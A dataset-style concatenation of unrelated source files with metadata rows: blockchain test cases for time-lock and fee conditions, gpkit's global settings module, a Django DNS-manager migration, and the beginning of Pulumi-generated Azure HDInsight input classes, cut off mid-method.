assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_RELATIVE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=301,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after 30 seconds from now
current_time_plus3 = uint64(blocks[-1].foliage_transaction_block.timestamp + 30)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_ABSOLUTE, [int_to_bytes(current_time_plus3)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent to early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 30 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_ABSOLUTE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=31,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_fee_condition(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires fee to be 10 mojo
cvp_fee = ConditionWithArgs(ConditionOpcode.RESERVE_FEE, [int_to_bytes(10)])
# This spend bundle has 9 mojo as fee
block1_dic_bad = {cvp_fee.opcode: [cvp_fee]}
block1_dic_good = {cvp_fee.opcode: [cvp_fee]}
block1_spend_bundle_bad = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_bad, fee=9
)
block1_spend_bundle_good = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_good, fee=10
)
log.warning(block1_spend_bundle_good.additions())
log.warning(f"Spend bundle fees: {block1_spend_bundle_good.fees()}")
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_bad,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.RESERVE_FEE_CONDITION_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_good,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
| 39.764012 | 115 | 0.680292 |
ace0a020585fb61ae290b56cf430a66102487d6a | 4,350 | py | Python | gpkit/gpkit/globals.py | UCLA-StarAI/LearnFairNB | f922d885399955737bd9f16a104f700004cd3846 | [
"Fair"
] | 3 | 2019-07-07T17:29:49.000Z | 2021-03-20T18:52:28.000Z | gpkit/globals.py | sichu366/gpkit | a8999737980ba45682e6e00770cf4546ca5337af | [
"MIT"
] | 1 | 2019-11-23T22:26:05.000Z | 2019-11-23T22:26:05.000Z | gpkit/gpkit/globals.py | UCLA-StarAI/LearnFairNB | f922d885399955737bd9f16a104f700004cd3846 | [
"Fair"
] | null | null | null | "global mutable variables"
import os
from collections import defaultdict
from . import build
def load_settings(path=None, firstattempt=True):
    """Load the settings file at `path`; return a settings dict.

    If no solvers are listed, attempt one build and re-read the settings;
    `firstattempt=False` on the recursive call prevents infinite recursion.
    """
    if path is None:
        # default location: <package dir>/env/settings
        path = os.sep.join([os.path.dirname(__file__), "env", "settings"])
    try:
        with open(path) as settingsfile:
            # each valid line looks like "name : value1, value2"
            lines = [line[:-1].split(" : ") for line in settingsfile
                     if len(line.split(" : ")) == 2]
            settings_ = {name: value.split(", ") for name, value in lines}
        for name, value in settings_.items():
            # hack to flatten 1-element lists,
            # unless they're the solver list
            if len(value) == 1 and name != "installed_solvers":
                settings_[name] = value[0]
    except IOError:
        # no settings file: treat as "no solvers installed"
        settings_ = {"installed_solvers": [""]}
    if settings_["installed_solvers"] == [""]:
        if firstattempt:
            # try to build solver bindings once, then re-read the settings
            print("Found no installed solvers, beginning a build.")
            build()
            settings_ = load_settings(path, firstattempt=False)
            if settings_["installed_solvers"] != [""]:
                settings_["just built!"] = True
            else:
                print("""
=============
Build failed! :(
=============
You may need to install a solver and then `import gpkit` again;
see https://gpkit.readthedocs.io/en/latest/installation.html
for troubleshooting details.
But before you go, please post the output above
(starting from "Found no installed solvers, beginning a build.")
to gpkit@mit.edu or https://github.com/convexengineering/gpkit/issues/new
so we can prevent others from having to see this message.
Thanks! :)
""")
    # first installed solver becomes the default
    settings_["default_solver"] = settings_["installed_solvers"][0]
    settings_["latex_modelname"] = True
    return settings_
# Settings are parsed (and a solver build attempted, if needed) once, at import time.
settings = load_settings()
SIGNOMIALS_ENABLED = set()  # the current signomial permissions; non-empty means enabled
class SignomialsEnabled(object):
    """Class to put up and tear down signomial support in an instance of GPkit.

    Safe to nest: only the outermost context actually revokes permissions
    on exit.

    Example
    -------
    >>> import gpkit
    >>> x = gpkit.Variable("x")
    >>> y = gpkit.Variable("y", 0.1)
    >>> with SignomialsEnabled():
    >>>     constraints = [x >= 1-y]
    >>> gpkit.Model(x, constraints).localsolve()
    """
    # pylint: disable=global-statement

    def __enter__(self):
        "Enables signomial support, remembering whether it was already on."
        # Previously __exit__ always removed True; a nested context's exit
        # would revoke the outer context's permission early and make the
        # outer exit raise KeyError. Track whether *this* context turned
        # support on so only the outermost context tears it down.
        self._was_enabled = True in SIGNOMIALS_ENABLED
        SIGNOMIALS_ENABLED.add(True)

    def __exit__(self, type_, val, traceback):
        "Disables signomial support unless an enclosing context enabled it."
        if not self._was_enabled:
            SIGNOMIALS_ENABLED.discard(True)
VECTORIZATION = []  # the current vectorization shape (most recently entered dimension first)
class Vectorize(object):
    """Context manager that extends all variables created inside it
    by an additional dimension of the given length.
    """

    def __init__(self, dimension_length):
        # length of the extra dimension applied while this context is active
        self.dimension_length = dimension_length

    def __enter__(self):
        "Enters a vectorized environment."
        # the most recent vectorization goes first in the global shape stack
        VECTORIZATION.insert(0, self.dimension_length)

    def __exit__(self, type_, val, traceback):
        "Leaves a vectorized environment."
        del VECTORIZATION[0]  # undo this context's dimension
MODELS = []  # the current model hierarchy (a stack of model names)
MODELNUMS = []  # model numbers corresponding to MODELS, above
# lookup table for the number of models of each name that have been made
MODELNUM_LOOKUP = defaultdict(int)
# maps (tuple(MODELS), tuple(MODELNUMS)) keys to the variables named in that environment
NAMEDVARS = defaultdict(list)
def reset_modelnumbers():
    "Resets every per-model-name counter in MODELNUM_LOOKUP to zero."
    for name in list(MODELNUM_LOOKUP):
        MODELNUM_LOOKUP[name] = 0
def begin_variable_naming(model):
    "Appends a model name and num to the environment."
    count = MODELNUM_LOOKUP[model]  # next unused number for this model name
    MODELNUM_LOOKUP[model] = count + 1
    MODELS.append(model)
    MODELNUMS.append(count)
    # return this model's number and the namespace key for NAMEDVARS
    return count, (tuple(MODELS), tuple(MODELNUMS))
def end_variable_naming():
    "Pops a model name and num from the environment."
    namespace = (tuple(MODELS), tuple(MODELNUMS))
    NAMEDVARS.pop(namespace, None)  # drop any variables recorded for this scope
    del MODELS[-1]
    del MODELNUMS[-1]
class NamedVariables(object):
    """Creates an environment in which all variables have
    a model name and num appended to their varkeys.

    Delegates to begin_variable_naming / end_variable_naming, which push
    and pop `model` on the module-level MODELS/MODELNUMS stacks.
    """
    def __init__(self, model):
        # name pushed onto the model hierarchy on entry
        self.model = model
    def __enter__(self):
        "Enters a named environment."
        begin_variable_naming(self.model)
    def __exit__(self, type_, val, traceback):
        "Leaves a named environment."
        end_variable_naming()
| 31.071429 | 79 | 0.650345 |
ace0a0246b42daad8693833ea9dbd90cbf5cf0cf | 14,718 | py | Python | dnsmanager/migrations/0001_initial.py | erdnaxe/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 8 | 2019-12-21T10:07:49.000Z | 2021-08-27T23:51:54.000Z | dnsmanager/migrations/0001_initial.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 6 | 2019-12-21T09:45:14.000Z | 2021-03-27T10:14:28.000Z | dnsmanager/migrations/0001_initial.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 3 | 2020-07-19T23:15:53.000Z | 2021-03-26T19:00:20.000Z | # Generated by Django 2.2.8 on 2019-12-19 11:14
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Record',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, help_text='The domain name for which this record is valid, ending in a dot.', max_length=253, verbose_name='name')),
('dns_class', models.CharField(choices=[('IN', 'IN (Internet)'), ('CS', 'CS (CSNET, obsolete)'), ('CH', 'CH (CHAOS)'), ('HS', 'HS (Hesiod)')], default='IN', help_text="You shouldn't need anything else than IN.", max_length=2, verbose_name='class')),
('ttl', models.PositiveIntegerField(default=3600, help_text='Limits the lifetime of this record.', null=True, verbose_name='Time To Live')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_dnsmanager.record_set+', to='contenttypes.ContentType')),
],
options={
'verbose_name': 'record',
'verbose_name_plural': 'records',
'ordering': ['zone', 'name'],
},
),
migrations.CreateModel(
name='Zone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=253, unique=True, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='name')),
('slug', models.SlugField(help_text='This zone will be accessible at /dns/{slug}/.', max_length=253, unique=True, verbose_name='slug')),
],
options={
'verbose_name': 'zone',
'verbose_name_plural': 'zones',
'ordering': ['name'],
},
),
migrations.CreateModel(
name='AddressRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('address', models.GenericIPAddressField(protocol='IPv4', verbose_name='IPv4 address')),
],
options={
'verbose_name': 'A record',
'verbose_name_plural': 'A records',
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='CanonicalNameRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('c_name', models.CharField(help_text='This domain name will alias to this canonical name.', max_length=253, verbose_name='canonical name')),
],
options={
'verbose_name': 'CNAME record',
'verbose_name_plural': 'CNAME records',
'ordering': ['c_name'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='CertificationAuthorityAuthorizationRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('flags', models.PositiveIntegerField(validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(255)], verbose_name='flags')),
('tag', models.CharField(choices=[('issue', 'issue'), ('issuewild', 'issue wildcard'), ('iodef', 'Incident object description exchange format')], max_length=255, verbose_name='tag')),
('value', models.CharField(max_length=511, verbose_name='value')),
],
options={
'verbose_name': 'CAA record',
'verbose_name_plural': 'CAA records',
'ordering': ['flags'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='DelegationNameRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('d_name', models.CharField(help_text='This domain name will alias to the entire subtree of that delegation domain.', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='delegation domain name')),
],
options={
'verbose_name': 'DNAME record',
'verbose_name_plural': 'DNAME records',
'ordering': ['d_name'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='Ipv6AddressRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('address', models.GenericIPAddressField(protocol='IPv6', verbose_name='IPv6 address')),
],
options={
'verbose_name': 'AAAA record',
'verbose_name_plural': 'AAAA records',
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='MailExchangeRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('preference', models.PositiveIntegerField(validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(65535)], verbose_name='preference')),
('exchange', models.CharField(default='@', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='exchange server')),
],
options={
'verbose_name': 'MX record',
'verbose_name_plural': 'MX records',
'ordering': ['preference'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='NameServerRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('nsdname', models.CharField(default='@', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='name server')),
],
options={
'verbose_name': 'NS record',
'verbose_name_plural': 'NS records',
'ordering': ['nsdname'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='PointerRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('ptrdname', models.CharField(max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='pointer domain name')),
],
options={
'verbose_name': 'PTR record',
'verbose_name_plural': 'PTR records',
'ordering': ['ptrdname'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='ServiceRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('service', models.CharField(help_text='The symbolic name of the desired service.', max_length=253, verbose_name='service')),
('protocol', models.CharField(help_text='The transport protocol of the desired service, usually either TCP or UDP.', max_length=253, verbose_name='protocol')),
('priority', models.PositiveIntegerField(help_text='The priority of the target host, lower value means more preferred.', validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(65535)], verbose_name='priority')),
('weight', models.PositiveIntegerField(help_text='A relative weight for records with the same priority, higher value means higher chance of getting picked.', validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(65535)], verbose_name='weight')),
('port', models.PositiveIntegerField(validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(65535)], verbose_name='port')),
('target', models.CharField(help_text='The canonical hostname of the machine providing the service, ending in a dot.', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='target')),
],
options={
'verbose_name': 'SRV record',
'verbose_name_plural': 'SRV records',
'ordering': ['priority', 'target'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='SshFingerprintRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('algorithm', models.PositiveIntegerField(choices=[(1, 'RSA'), (2, 'DSA'), (3, 'ECDSA'), (4, 'Ed25519')], validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(4)], verbose_name='algorithm')),
('type', models.PositiveIntegerField(choices=[(1, 'SHA-1'), (2, 'SHA-256')], validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(2)], verbose_name='type')),
('fingerprint', models.CharField(max_length=64, verbose_name='fingerprint')),
],
options={
'verbose_name': 'SSHFP record',
'verbose_name_plural': 'SSHFP records',
'ordering': ['algorithm'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='StartOfAuthorityRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('mname', models.CharField(help_text='Primary master name server for this zone.', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='master name server')),
('rname', models.EmailField(help_text='Email address of the administrator responsible for this zone.', max_length=254, verbose_name='responsible email')),
('serial', models.BigIntegerField(help_text='A slave name server will initiate a zone transfer if this serial is incremented.', verbose_name='serial number')),
('refresh', models.BigIntegerField(default=86400, help_text='Number of seconds after which secondary name servers should query the master to detect zone changes.', verbose_name='refresh')),
('retry', models.BigIntegerField(default=7200, help_text='Number of seconds after which secondary name servers should retry to request the serial number from the master if the master does not respond.', verbose_name='retry')),
('expire', models.BigIntegerField(default=3600000, help_text='Number of seconds after which secondary name servers should stop answering request for this zone if the master does not respond.', verbose_name='expire')),
('minimum', models.BigIntegerField(default=172800, help_text='Time to live for purposes of negative caching.', verbose_name='minimum')),
],
options={
'verbose_name': 'SOA record',
'verbose_name_plural': 'SOA records',
'ordering': ['mname'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='TextRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('data', models.TextField()),
],
options={
'verbose_name': 'TXT record',
'verbose_name_plural': 'TXT records',
},
bases=('dnsmanager.record',),
),
migrations.AddField(
model_name='record',
name='zone',
field=models.ForeignKey(help_text='This record will be applied on that zone.', on_delete=django.db.models.deletion.CASCADE, to='dnsmanager.Zone', verbose_name='zone'),
),
]
| 66.9 | 369 | 0.608099 |
ace0a0d71b6a8f224865e1ffce3ac61e1fe45965 | 359,486 | py | Python | sdk/python/pulumi_azure/hdinsight/_inputs.py | roderik/pulumi-azure | f6d0c058d6f9111a709bc5f1515d1638f9d615f0 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/hdinsight/_inputs.py | roderik/pulumi-azure | f6d0c058d6f9111a709bc5f1515d1638f9d615f0 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/hdinsight/_inputs.py | roderik/pulumi-azure | f6d0c058d6f9111a709bc5f1515d1638f9d615f0 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
# Public API of this module: one pulumi input-type (*Args) class per nested
# configuration block of the HDInsight cluster resources (HBase, Hadoop,
# Interactive Query, Kafka, ML Services, R Server, Spark and Storm).
__all__ = [
    'HBaseClusterComponentVersionArgs',
    'HBaseClusterGatewayArgs',
    'HBaseClusterMetastoresArgs',
    'HBaseClusterMetastoresAmbariArgs',
    'HBaseClusterMetastoresHiveArgs',
    'HBaseClusterMetastoresOozieArgs',
    'HBaseClusterMonitorArgs',
    'HBaseClusterRolesArgs',
    'HBaseClusterRolesHeadNodeArgs',
    'HBaseClusterRolesWorkerNodeArgs',
    'HBaseClusterRolesWorkerNodeAutoscaleArgs',
    'HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
    'HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
    'HBaseClusterRolesZookeeperNodeArgs',
    'HBaseClusterSecurityProfileArgs',
    'HBaseClusterStorageAccountArgs',
    'HBaseClusterStorageAccountGen2Args',
    'HadoopClusterComponentVersionArgs',
    'HadoopClusterGatewayArgs',
    'HadoopClusterMetastoresArgs',
    'HadoopClusterMetastoresAmbariArgs',
    'HadoopClusterMetastoresHiveArgs',
    'HadoopClusterMetastoresOozieArgs',
    'HadoopClusterMonitorArgs',
    'HadoopClusterNetworkArgs',
    'HadoopClusterRolesArgs',
    'HadoopClusterRolesEdgeNodeArgs',
    'HadoopClusterRolesEdgeNodeInstallScriptActionArgs',
    'HadoopClusterRolesHeadNodeArgs',
    'HadoopClusterRolesWorkerNodeArgs',
    'HadoopClusterRolesWorkerNodeAutoscaleArgs',
    'HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs',
    'HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
    'HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
    'HadoopClusterRolesZookeeperNodeArgs',
    'HadoopClusterSecurityProfileArgs',
    'HadoopClusterStorageAccountArgs',
    'HadoopClusterStorageAccountGen2Args',
    'InteractiveQueryClusterComponentVersionArgs',
    'InteractiveQueryClusterGatewayArgs',
    'InteractiveQueryClusterMetastoresArgs',
    'InteractiveQueryClusterMetastoresAmbariArgs',
    'InteractiveQueryClusterMetastoresHiveArgs',
    'InteractiveQueryClusterMetastoresOozieArgs',
    'InteractiveQueryClusterMonitorArgs',
    'InteractiveQueryClusterNetworkArgs',
    'InteractiveQueryClusterRolesArgs',
    'InteractiveQueryClusterRolesHeadNodeArgs',
    'InteractiveQueryClusterRolesWorkerNodeArgs',
    'InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs',
    'InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs',
    'InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
    'InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
    'InteractiveQueryClusterRolesZookeeperNodeArgs',
    'InteractiveQueryClusterSecurityProfileArgs',
    'InteractiveQueryClusterStorageAccountArgs',
    'InteractiveQueryClusterStorageAccountGen2Args',
    'KafkaClusterComponentVersionArgs',
    'KafkaClusterGatewayArgs',
    'KafkaClusterMetastoresArgs',
    'KafkaClusterMetastoresAmbariArgs',
    'KafkaClusterMetastoresHiveArgs',
    'KafkaClusterMetastoresOozieArgs',
    'KafkaClusterMonitorArgs',
    'KafkaClusterRestProxyArgs',
    'KafkaClusterRolesArgs',
    'KafkaClusterRolesHeadNodeArgs',
    'KafkaClusterRolesKafkaManagementNodeArgs',
    'KafkaClusterRolesWorkerNodeArgs',
    'KafkaClusterRolesZookeeperNodeArgs',
    'KafkaClusterSecurityProfileArgs',
    'KafkaClusterStorageAccountArgs',
    'KafkaClusterStorageAccountGen2Args',
    'MLServicesClusterGatewayArgs',
    'MLServicesClusterRolesArgs',
    'MLServicesClusterRolesEdgeNodeArgs',
    'MLServicesClusterRolesHeadNodeArgs',
    'MLServicesClusterRolesWorkerNodeArgs',
    'MLServicesClusterRolesZookeeperNodeArgs',
    'MLServicesClusterStorageAccountArgs',
    'RServerClusterGatewayArgs',
    'RServerClusterRolesArgs',
    'RServerClusterRolesEdgeNodeArgs',
    'RServerClusterRolesHeadNodeArgs',
    'RServerClusterRolesWorkerNodeArgs',
    'RServerClusterRolesZookeeperNodeArgs',
    'RServerClusterStorageAccountArgs',
    'SparkClusterComponentVersionArgs',
    'SparkClusterGatewayArgs',
    'SparkClusterMetastoresArgs',
    'SparkClusterMetastoresAmbariArgs',
    'SparkClusterMetastoresHiveArgs',
    'SparkClusterMetastoresOozieArgs',
    'SparkClusterMonitorArgs',
    'SparkClusterNetworkArgs',
    'SparkClusterRolesArgs',
    'SparkClusterRolesHeadNodeArgs',
    'SparkClusterRolesWorkerNodeArgs',
    'SparkClusterRolesWorkerNodeAutoscaleArgs',
    'SparkClusterRolesWorkerNodeAutoscaleCapacityArgs',
    'SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
    'SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
    'SparkClusterRolesZookeeperNodeArgs',
    'SparkClusterSecurityProfileArgs',
    'SparkClusterStorageAccountArgs',
    'SparkClusterStorageAccountGen2Args',
    'StormClusterComponentVersionArgs',
    'StormClusterGatewayArgs',
    'StormClusterMetastoresArgs',
    'StormClusterMetastoresAmbariArgs',
    'StormClusterMetastoresHiveArgs',
    'StormClusterMetastoresOozieArgs',
    'StormClusterMonitorArgs',
    'StormClusterRolesArgs',
    'StormClusterRolesHeadNodeArgs',
    'StormClusterRolesWorkerNodeArgs',
    'StormClusterRolesZookeeperNodeArgs',
    'StormClusterStorageAccountArgs',
]
@pulumi.input_type
class HBaseClusterComponentVersionArgs:
    # Component version settings for an HDInsight HBase cluster; currently
    # only the HBase component version is configurable here.
    def __init__(__self__, *,
                 hbase: pulumi.Input[str]):
        """
        :param pulumi.Input[str] hbase: The version of HBase which should be used for this HDInsight HBase Cluster. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "hbase", hbase)
    @property
    @pulumi.getter
    def hbase(self) -> pulumi.Input[str]:
        """
        The version of HBase which should be used for this HDInsight HBase Cluster. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "hbase")
    @hbase.setter
    def hbase(self, value: pulumi.Input[str]):
        pulumi.set(self, "hbase", value)
@pulumi.input_type
class HBaseClusterGatewayArgs:
    # Credentials for the Ambari web portal exposed through the cluster gateway.
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        # `enabled` is deprecated upstream (the HDInsight API no longer supports
        # disabling the gateway): warn and record it only when it was supplied.
        # NOTE: the generator emitted two consecutive identical `is not None`
        # checks here; they are merged into a single guard with the same effect.
        if enabled is not None:
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The password used for the Ambari Portal.
        """
        return pulumi.get(self, "password")
    @password.setter
